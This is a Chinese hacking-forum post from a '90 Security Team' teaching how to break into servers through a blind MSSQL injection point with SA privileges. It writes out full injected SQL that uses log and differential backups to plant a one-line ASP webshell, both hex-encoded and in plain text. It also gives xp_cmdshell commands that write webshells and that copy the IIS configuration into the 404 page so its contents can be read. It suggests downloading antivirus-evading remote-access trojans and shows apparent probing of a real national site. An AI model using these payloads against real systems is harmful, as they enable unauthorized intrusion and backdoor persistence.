找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2229|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————, G. c* P7 f5 G. z, x* c* L1 d! M

, p2 t' z+ I/ t# [9 L
& a) u  u, j/ x7 Z0 J                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
2 E1 Q" U" C6 w+ l2 K& i
. d/ _- P* I0 P$ }$ K9 H                                                                 0 }5 V3 D2 W. @, p6 f; b
                                                                 
4 V  r; A7 m" t+ ]/ Z                                                                  论坛: http://www.90team.net/$ S! B: r3 Q& i1 |' M3 z

( Y/ v. C: G7 y  l. b
% N9 d- W  F  t1 ~, @5 c
& b4 U8 z: [( R友情检测国家人才网! F* p9 V6 _: s4 w  T
0 C, |% L/ A# I1 X

' R, D. |$ z; U7 x( v1 A# |内容:MSSQL注入SA权限不显错模式下的入侵% F" _' _- a. \- L
4 g# F% F+ @( T$ h' S/ {3 @% {1 i

( Z+ p! x# M3 `' K5 _  |0 K一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
& U8 X6 e% {2 E. i7 O4 {' r& v! M4 G( ]) k
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
" O, A$ y: ]# j8 h  Y: U5 @. o4 K1 M* A- e* \% s

  j! L0 ~5 K" |/ E$ A这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。3 w! g1 o2 C* s+ H1 z
8 _" `" [' a) H/ I( s* a
思路:
( |1 @& ~# V% `; K0 K+ P/ o) h8 G# _4 T3 C, j9 U) i. {2 h  D
首先:
7 M- u5 ~0 m% ?$ p3 Q3 u0 L( f( P3 b& l& L' r. t
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
& c+ [- g2 Q1 U" o: g6 Q# x6 O" B8 F! b! r5 x+ L8 R8 t# B
1.日志备份获得Webshell
' g  |/ r5 T7 W6 M& E, x! F* v( J
2.数据库差异备份获得Webshell
, T* w! e- E1 c! a% s0 ?
9 H3 w' K8 v& I) z: T0 v) y; S4.直接下载免杀远控木马。
0 m+ z- U5 h! r4 M5 U
# P$ Q1 {, v8 p6 L5.直接下载LCX将服务器端口转发出来
4 `0 q7 V+ q2 X: R* H
$ g! K) E3 c0 P' L0 j1 F5 U& w, K* M6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
) l( M; z2 Q* l! v! Y1 [: B$ `& `
6 m; _0 I% k; Y; D$ g% w9 g
- s6 h) ], q, f6 ~8 }6 c3 W: `' F6 H7 f: ]/ p
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
& v' d& F1 O1 x) w( R) n1 v
: N% `$ j  l* T% D  D5 L/ H9 b我直接演示后面一个方法5 O, N8 g" }3 w1 R4 M$ u
+ C& q* P) ~# ?! s% {2 b1 V

+ H& u: h" W+ c$ w, D5 L/ n分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
( ~) o  c  e- G" @. j" w
& |  h. Q4 j/ s& Q7 [/ B% C; _
6 y/ R* _7 V3 Z  u. O: {9 v; j4 J3 A( a' t
7 S. P% M9 j' a2 b' [: V  O) S
◆日志备份:2 n; _5 `2 [% Z! J! t$ E" s$ L" P* ~& m
# p, u+ \- X2 B/ w0 l" |, w
5 E9 s, N+ ]7 C# S1 b% w
1. 进行初始备份
! |/ d7 L" c/ [; Z7 V5 Q) L8 V; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
* P: t9 z: q; V" b3 t" ^* A, Z
2. 插入数据
- N+ u( [8 K1 C) ]0 J) U* L! R;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
( s+ c$ {7 P* P' ~! n% A( {- D5 z  ~) A3 I* j
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>0 V2 L+ I4 n1 o- K* C' n- O2 Y
  
# @, i, J  R0 ^; i% ?) j; `3. 备份并获得文件,删除临时表
! s6 y  K2 d3 b2 C8 E5 {2 Z# r- j6 U;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--' m+ {" H; m* R* ~/ F; C* V. {

3 b* U2 F4 S! [
/ U* H3 `% U- j& e0 t, L* O8 w
" K& ], X9 J2 x7 r1 T) x# w, {◆数据库差异备份6 q' V0 f2 z( M; u) u
" x2 g/ I0 _6 ]/ x  u
(1. 进行差异备份准备工作
" R0 I& a2 ^+ |" @5 k2 @+ r0 V
: h; R0 m9 W# M4 O8 i- m0 K2 U;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--8 O; V% s0 j4 d4 V/ v
5 L! i4 I& A5 a) }
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码! }% o2 H; J/ n/ ^! R' C

# e4 {; t: j/ s
4 H4 @3 P  l0 c1 ~* i(2. 将数据写入到数据库
# ^) L; H8 k. f/ `& Y6 l# C;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
& h. C7 G+ ~* l5 _; W1 [
7 B8 N+ p/ h! O( v: r5 c0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  e' w+ d  _2 w2 Q$ _& L+ t! b; |8 a! G% M- Q5 e4 X" r: h5 D
3. 备份数据库并清理临时文件
# ^0 k- g% D: {4 B! |8 n
& D6 \9 V0 ]' ~( [) b. f; K;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
2 T) l. _1 O( A! P7 `, j5 p7 P
/ H7 Z: L; b! o& i$ ?" Z0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 7 s. I- ?; v1 Q: E# l

: H& z: O6 G5 ^6 F0 x  W5 b4 c) I. C9 f/ g
0 b4 \* _; @2 E, x, w
用^转义字符来写ASP(一句话木马)文件的方法:   2 N* t- i& ~6 I! k9 v9 \

5 @4 X) }4 e, n. j1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--, ^  f. |' t/ d3 A
! i: @  }& K: E8 i9 `  R/ H
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
. q. ~7 B/ e6 r( b0 B' ~1 L+ G( y1 r( z1 z) Z
读取IIS配置信息获取web路径
9 c. {. N( C  R& ?
+ i7 {; w( G5 e/ F$ z+ F     / e: F/ K4 L$ A+ `8 A
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
0 K3 Y' v$ e- R/ E. H6 }3 S# ^1 V# ]# w% D3 o4 M
执行命令" n6 L: m6 W6 M, O
     
! k% D* x* J2 R$ M. t' u     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
$ @: R) ^) t, J( ^9 M/ n9 m; a+ V6 w% V. }/ J$ z

! l: g2 c- Q9 O. J8 |. E" ~+ f6 i% F1 |* d  U0 q! U# \
2 P( F$ B  j9 ^6 v$ Q; J

" `& A) ?9 s5 _+ Q' ~; ^  k$ ?. f* k7 q: k$ ^

/ X9 y% p7 X/ @# _5 t
5 G1 Y# G! X  F0 L! l5 \* n# p3 Q# @7 x& C+ L

6 a) L0 D2 k+ T' l/ v9 ?% M+ c
& M' [1 J  m* M8 m, R9 _. j' b/ ~9 f. K+ J
& w; Y1 q$ n$ i! z% j
' N6 R/ ], A- w% I' u$ h% i
0 `8 k) Z/ R, z
3 q  b$ p7 i7 x& R; N+ T( |1 B3 G

  W; a0 v+ d% `3 C  D  ~' }9 J" V+ N
" [, s1 _$ c0 Q9 s
+ r, M  b( e: B9 T6 I
0 j+ n0 W0 c! P( s1 y% \& y% k8 w2 ^7 F! ~0 q7 }# P; y& A

9 q1 |, c& r) R/ z$ e- l
+ b. O  w& q" `+ G4 N  n3 _  V; q5 Q# l% t1 L8 n$ s1 W* T; l
7 I8 j  O) H) r2 Z3 j
0 ?- f( \8 o# a* o1 S+ _/ M

$ y4 s% ^# C4 F. ~, x3 F8 F! u* Q* ^) |/ t! T4 R
) z# e4 ]7 n4 K
3 ^8 K" i8 @; n6 p
3 @6 s* q# d! F& ^' b& t
2 N8 ?/ Y2 `9 S& C% H  Y
3 [. }0 r4 L1 ?& o& U/ P  v
# b+ m1 Q. t( Q- [/ P

! X3 ^  I9 m6 V& w2 d( ^* _, T
4 h8 c* X# ?4 V* H! ?. T& t% T9 Y1 K$ C2 p

. e. ~: f0 e2 {# {: y" j& g4 s$ |; o$ V' L- p3 A% g

( n4 e* V" w& ]9 ?: m$ Y2 z. f1 v* y! }
. G8 o& \& P7 Q% R! n

) H* j* a# O. |5 N5 \8 W
3 }# D, R. k- D- u3 I
5 M. X5 G% B0 ]; t" H1 T
3 c1 H, O2 o& E+ v" T
( q# P9 J  G8 w! s/ U; Y% L$ l! r5 {( c! R8 C1 o/ o% \' t9 g" G" C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表